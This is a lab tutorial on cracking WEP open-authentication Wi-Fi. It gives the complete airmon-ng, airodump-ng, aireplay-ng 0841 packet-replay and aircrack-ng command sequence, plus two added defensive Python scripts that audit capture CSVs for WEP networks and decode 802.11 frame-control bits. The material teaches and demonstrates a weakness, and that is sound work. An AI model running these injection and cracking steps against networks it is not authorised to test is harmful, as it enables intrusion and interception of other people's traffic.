8 – Open Authentication (OA) – WEP OPN – Interactive Packet Replay attack

Similar to the previous lesson, in which we eventually obtained the shared key by decrypting it over the air, we did not even have to authenticate with the access point in order to obtain the key. With open system authentication we don't need to present any credentials to the access point during authentication; any client can connect. WEP still encrypts the data frames, however, so in order to read that data we will need the correct key.

Open authentication, despite what the name suggests, is actually the advisable choice over shared key authentication. Both mechanisms are weak, as I am sure you understand by now, and have been replaced by WPA/WPA2, which secure your network with a pre-shared key similar to the one that would have been used with WEP SKA.

Let's get to it!

Configure your access point to the following settings:

[Figure 1: Open System Authentication Configuration 1]

[Figure 1 (cont.): Open System Authentication Configuration 2]

Now put your card into monitor mode; you know by now that this comes first, so run:

airmon-ng start wlan0 6

The “6” at the end puts the card on channel 6 for you.

[Figure 2: Enable monitor mode]

Next start airodump-ng with:

airodump-ng --bssid 00:18:E7:XX:XX:XX --channel 6 -w testcapture mon0

“--bssid” is your AP_MAC
“--channel 6” sets channel 6
“-w testcapture” writes the capture to files named testcapture
“mon0” is your wireless card interface

[Figure 3: Start airodump]

Airodump-ng output will look like the following:

[Figure 4: airodump output]

Note that, as in the Shared Key Authentication lesson, the AUTH column tells you the mode; in this case it reads “OPN” for Open System Authentication.
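The same airodump-ng run also writes a testcapture-01.csv beside the .cap file, and that table is what a network owner would use to audit their own estate for WEP networks, whichever AUTH mode they use. The script below is an added example, not part of the original tutorial: it parses the access-point section of an airodump-ng CSV and flags every network whose Privacy column is WEP. The column names follow the layout airodump-ng writes (assumed from the tool's CSV output), and the sample rows are constructed, not captured from the lesson's lab.

```python
import csv
import io

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv:
# an optional leading blank line, the AP table, a blank line, then the
# station table. All addresses, times and counts here are made up.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:18:E7:AA:BB:CC, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP, OPN, -40,      120,     3500,   0.  0.  0.  0,   4, test, 
00:18:E7:DD:EE:FF, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,       80,        0,   0.  0.  0.  0,   6, office, 
00:18:E7:11:22:33, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WEP , WEP, SKA, -70,       40,      900,   0.  0.  0.  0,   5, guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:C0:CA:12:34:56, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -30, 4200, 00:18:E7:AA:BB:CC, 
"""


def parse_access_points(text):
    """Return the AP rows of an airodump-ng CSV as dicts keyed by the stripped
    header names. Reading stops at the blank line before the station table."""
    lines = text.splitlines()
    i = 0
    while i < len(lines) and not lines[i].strip():   # skip leading blank line(s)
        i += 1
    ap_lines = []
    for line in lines[i:]:
        if not line.strip():                          # blank line ends the AP table
            break
        ap_lines.append(line)
    rows = list(csv.reader(io.StringIO("\n".join(ap_lines))))
    header = [h.strip() for h in rows[0]]
    aps = []
    for row in rows[1:]:
        if len(row) < len(header):                    # tolerate a short row
            row = row + [""] * (len(header) - len(row))
        aps.append({h: v.strip() for h, v in zip(header, row)})
    return aps


def find_wep_networks(aps):
    """Flag every network still running WEP. OPN and SKA are reported but not
    treated differently: neither mode protects the data frames."""
    findings = []
    for ap in aps:
        if "WEP" in ap["Privacy"].upper():
            findings.append({
                "bssid": ap["BSSID"],
                "essid": ap["ESSID"],
                "channel": int(ap["channel"]),
                "auth": ap["Authentication"] or "unknown",
                "ivs_seen": int(ap["# IV"] or 0),
            })
    return findings


def audit(text=SAMPLE_CSV):
    """Parse a CSV and return the WEP findings, in file order."""
    return find_wep_networks(parse_access_points(text))


if __name__ == "__main__":
    for f in audit():
        print(f"WEP network {f['essid']!r} ({f['bssid']}) on channel {f['channel']}, "
              f"AUTH {f['auth']}, {f['ivs_seen']} IVs already seen")
```

Point the script at a real testcapture-01.csv by passing the file contents to audit(); a rising "# IV" count on a WEP network is itself worth alerting on, since it is exactly what the replay step below produces.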

Associate with the access point

aireplay-ng -1 0 -e test -a 00:18:E7:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0

[Figure 5: associate with access point]

Successful association looks like the following:

[Figure 6: associate success with access point]

Starting the 0841 interactive packet replay attack

[Figure 7: WEP 0841 attack]

“-2” is for interactive frame selection and starts the interactive packet replay
“-p 0841” sets the Frame Control Field so that the packet looks like it is coming from a wireless client
“-c FF:FF:FF:FF:FF:FF” sets the destination MAC to broadcast. This is required to make the AP replay the packet and thus produce a new IV
“-b” is the AP MAC address
“-h” is the MAC of YOUR card
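Why “0841” makes a frame look like it comes from a wireless client is plain once the two Frame Control bytes are decoded, and the same decoding is what an analyst does when reading a capture of this traffic. The decoder below is an added example, not code from the tutorial or from aircrack-ng: it takes the four hex digits in the order the page writes them (assumed: first the version/type/subtype byte, then the flags byte) and names the fields per the IEEE 802.11 Frame Control layout.

```python
# Names for the two-bit Type field of the 802.11 Frame Control word.
FRAME_TYPES = {0: "management", 1: "control", 2: "data", 3: "extension"}

# Bit position in the flags byte -> flag name (802.11 Frame Control layout).
FLAG_BITS = [
    (0, "to_ds"), (1, "from_ds"), (2, "more_fragments"), (3, "retry"),
    (4, "power_mgmt"), (5, "more_data"), (6, "protected"), (7, "order"),
]


def decode_frame_control(word_hex):
    """Decode a Frame Control word given as four hex digits, e.g. "0841".
    Assumed byte order: high byte = version/type/subtype, low byte = flags."""
    word = int(word_hex, 16)
    if not 0 <= word <= 0xFFFF:
        raise ValueError("Frame Control is a 16-bit field")
    first, flags = word >> 8, word & 0xFF
    decoded = {
        "version": first & 0x03,            # bits 0-1
        "type": FRAME_TYPES[(first >> 2) & 0x03],  # bits 2-3
        "subtype": (first >> 4) & 0x0F,     # bits 4-7
    }
    for bit, name in FLAG_BITS:
        decoded[name] = bool(flags & (1 << bit))
    return decoded


def describe_direction(fc):
    """Read the To DS / From DS pair as the direction the frame claims."""
    if fc["to_ds"] and not fc["from_ds"]:
        return "station -> AP"
    if fc["from_ds"] and not fc["to_ds"]:
        return "AP -> station"
    if fc["to_ds"] and fc["from_ds"]:
        return "AP -> AP (WDS)"
    return "station -> station (IBSS/direct)"


def summarize(word_hex):
    """One-line description of a Frame Control word."""
    fc = decode_frame_control(word_hex)
    protection = "WEP/protected" if fc["protected"] else "unprotected"
    return f"{fc['type']} frame (subtype {fc['subtype']}), {describe_direction(fc)}, {protection}"


if __name__ == "__main__":
    # The value from the tutorial: a protected data frame headed station -> AP.
    print(summarize("0841"))
    # Flipping To DS for From DS gives the AP -> station direction instead.
    print(summarize("0842"))
```

In a capture of this activity, an analyst sees a burst of identical-length protected data frames from one station MAC with To DS set and a broadcast destination; the decoder makes those header bits readable without a protocol dissector.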

You will need to select a packet; feel free to answer “no” until you get one slightly bigger than a size of 86 if you want. I personally find you have better success if you do this.

Once you have selected a packet, look at the bottom left: you will see injection start and your packets per second should rise as well. As you can see, I have 499 pps below.

[Figure 7.1: WEP 0841 output, select packet]

Check your airodump output and you should see that your frame and data counts have risen greatly. Then check your capture directory and run aircrack-ng.

[Figure 8: Check capture directory]

Start aircrack-ng with:

aircrack-ng -b 00:18:E7:XX:XX:XX testcapture*.cap

“-b” selects your AP_MAC
“testcapture*.cap” runs aircrack-ng against all the capture files in the directory named testcapture-X.cap

[Figure 9: Start aircrack]

After a short period of time, success looks like this:

[Figure 10: aircrack success]


Lesson Learned:

WEP open system authentication is no better at protecting your privacy than WEP shared key authentication; with a few minutes and some patience it can be compromised easily, giving an attacker access to your internal resources. Don't rely on WEP at all. Do not use it; it is not secure and is trivial to crack.
